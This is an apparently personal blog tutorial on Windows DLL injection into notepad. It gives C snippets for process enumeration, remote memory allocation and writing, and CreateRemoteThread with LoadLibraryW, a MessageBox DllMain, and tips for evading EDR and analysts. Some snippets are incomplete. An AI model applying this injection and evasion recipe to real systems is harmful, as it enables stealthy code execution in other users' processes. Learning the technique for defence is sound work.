Hey folks! It’s been a while since I last posted anything on the blog but we are back! and gonna be posting again regularly ;) I will explain as much as possible without going on a lot of tangents so further reading is always encouraged. Of course this is for educational purposes only blah blah.

DLL Injection???


DLL injection is a “sneaky” way to insert our code in the address space of the target process thereby executing our code! So when our malicious code executes it is not our process that is causing the harm and of course it’s notepad! Yet it is not as foolproof -hence “sneaky”- as an EDR can detect the injection attempt with the sequence Win32 API calls.

Of course evading an EDR is not impossible (e.g. API Hooking).

Don’t You Mean DLL Hijacking?

While both techniques have the same end goal in mind (Running our DLL in another process) each of them takes a different path to get there. DLL hijacking abuses the Dynamic-link library search order when the legitimate binary searches for the legitimate DLL to load it will find the malicious DLL first thereby executing the malicious code and this technique is very common in phishing attacks.

How Does it Work?

I created a humble diagram below that sums the steps you would take to pull off a DLL injection but before we further apply the steps in the diagram there is a prerequisite we need to know which is the PID of the target process, the way I would go for this is to use CreateToolhelp32Snapshot, Process32First and Process32Next to get a list of the running processes iterate through them till you get the process find the name of the process you’re looking for that would be something like this:

	PROCESSENTRY32 currentProcess;
	HANDLE Hsnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	if (Hsnapshot == INVALID_HANDLE_VALUE) {
		printf("couldn't take snapshot\n");
		return 1;

	currentProcess.dwSize = sizeof(PROCESSENTRY32);
	if (!Process32First(Hsnapshot, &currentProcess)) {
		printf("couldn't access first process!\n");
		return 1;

	while (Process32Next(Hsnapshot, &currentProcess) && wcscmp(&currentProcess.szExeFile, targetBin)) {

	_tprintf(TEXT("\nFOUND THE PROCESS:\t%s"), currentProcess.szExeFile);
	_tprintf(TEXT("\nProcess ID:\t0x%08X\n"), currentProcess.th32ProcessID);

	int targetPID = currentProcess.th32ProcessID;

	if (targetPID == 0) {
		printf("couldn't get PID");
		return 1;

	return targetPID;

So what this does is take a snapshot of running processes then we would iterate through them till we hit our targetBin , which is a defined process I declared above and I print it as a sanity check OR When the Process32Next() returns FALSE which means it failed to get the next process for simplify we will assume that it means that it hit the end of our process list which would mean that it failed to get the next process.

Note that the PROCESSENTRY32 is a structure for defining a process’s information when we the snapshot was taken as you might guess we kinda need that.


Looking at our diagram the first step is to call OpenProcess() with our newly acquired PID ;)


The first part is fairly straightforward with us calling OpenProcess allowing us to get a handle on our target process that we can use to allocate memory and more in the next steps. it’s worth noting that it’s good practice to request as few permissions as you can as you would hopefully not raise much suspicion, so instead of calling PROCESS_ALL_ACCESS for the first parameter we can call:

  • PROCESS_VM_WRITE to allocate memory in the target process.
  • PROCESS_VM_OPERATION to use the allocated memory space.
  • PROCESS_CREATE_THREAD to eventually create our remote thread that will run our DLL.

Rest of the permissions here

LPVOID buffer = VirtualAllocEx(HTarget, 0, sizeof(DLLPath), MEM_COMMIT, PAGE_EXECUTE_READWRITE);

Now in the second phase, we want to allocate some space in the target’s memory address space and we can achieve that by VirtualAllocEx, the EX stands for extended as the difference between VirtualAlloc and VirtualAllocEx is that the second one is used for allocating space in another process which is EXACTLY what we are doing!

Note that the space allocated by VirtualAllocEx is initialized by zeros and the actual physical pages are not allocated until we access/use them as we passed MEM_COMMIT as the allocation type.

Something I found confusing at first is the size of the memory allocation let’s take a look at the example above and assume we have our path for the DLL something like:

wchar_t DLLPath[] = TEXT("C:\\Users\\vog\\source\\repos\\Trial_DLL\\x64\\Debug\\Trial_DLL.dll");

So when specifying the size to allocate in bytes we are specifying the size of the DLL path not the actual size of the DLL file, meaning we are allocating enough space in the target process to store the path of our DLL in the target process’s memory space. We are not loading the DLL file into the target process ourselves we are letting the target process do the dirty work for us as we are going to see in a bit.

Finally the VirutalAllocEx returns the start address(pointer) of our newly acquired buffer in the target process!


WriteProcessMemory(HTarget, buffer, (LPVOID)DLLPath, sizeof(DLLPath), 0)

Next, we just write the data into the buffer we just allocated.

LPTHREAD_START_ROUTINEthreatStartRoutineAddress = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L"Kernel32.dll"), "LoadLibraryW")

Now before creating our thread, we need to define its behavior(routine)upon running, we are telling the thread that it should look run LoadLibraryW upon running by locating its address in the Kernel32.dll.

CreateRemoteThread(HTarget, 0, 0, threatStartRoutineAddress, buffer, 0, 0);

Lastly, we’re finally calling CreateRemoteThread to execute our DLL in the target process with our LPTHREAD_START_ROUTINE pointing to the LoadLibrary that will load the DLL from the path stored in the buffer.

What’s inside a DLL?

So, what happens when the target process finally calls the DLL? How will it know what to do with it? I mean it was not expecting our DLL in the first place.

And here comes DLLMain. DLLs have a useful function that serves a similar purpose to the main ones we find in C/++/#, let’s take a look:

// dllmain.c : Defines the entry point for the DLL application.

	DWORD  ul_reason_for_call,
	LPVOID lpReserved

	switch (ul_reason_for_call)
			0,       //[in, optional] HWND hWnd,//
			L"TEXT", //[in, optional] LPCTSTR lpText,//
			L"TITLE", //[in, optional] LPCTSTR lpCaption, //
			1        //[in]UINT uType//
	return TRUE;

Now let’s take a look at the switch cases and in particular DLL_PROCESS_ATTACH case will automatically execute when the DLL is loaded

	switch (ul_reason_for_call)
	//code to execute when the DLL is loaded

The Hijacking

I hope you’re still with me because now we are gonna run notepad and inject our DLL and see what happens!


It works!!! (DUH)

That is not enough for us we gotta see the DLL loaded onto notepad. Let’s open process explorer and see.


Indeed everything is going as we expect, we can also check the threads to see our thread running LoadLibraryW


The last thing that we can visualize is the memory allocation for that we need to use process hacker as process explorer for some reason doesn’t show us the memory (as far as I know)


Yes the rwx does stick out and it will for any analyst for that we can change PAGE_EXECUTE_READWRITE to PAGE_READWRITE instead

Things to Consider

Error Checking habits

Something that will save you a lot of time when things break -which they always will- is putting the time into code handling functions that check the return value of the API calls. A very useful resource I found was Retrieving the Last-Error Code And calling it after you error check. For Example:

	LPVOID buffer = VirtualAllocEx(HTarget, 0, sizeof(DLLPath), MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	if (buffer == NULL) {

After calling the VirtualAllocEX it’s wise to check if anything was allocated by checking if the buffer isn’t equal to null and if it is then something went wrong there.

If you are not sure what the function should return just google it and the first result should be MSDN which covers almost everything pretty well.

Process Architecture

Depending on the process architecture and if it’s an official Microsoft process it may be harder to inject the DLL.

For example, if our injector process is 32-bit and the target is 64-bit or vice versa the injection cannot work.


Thanks for tuning in! I hope you enjoyed the blog post and found it useful. Your thoughts and suggestions are super important to me, so if you have any feedback or suggestions Don’t hesitate to reach out.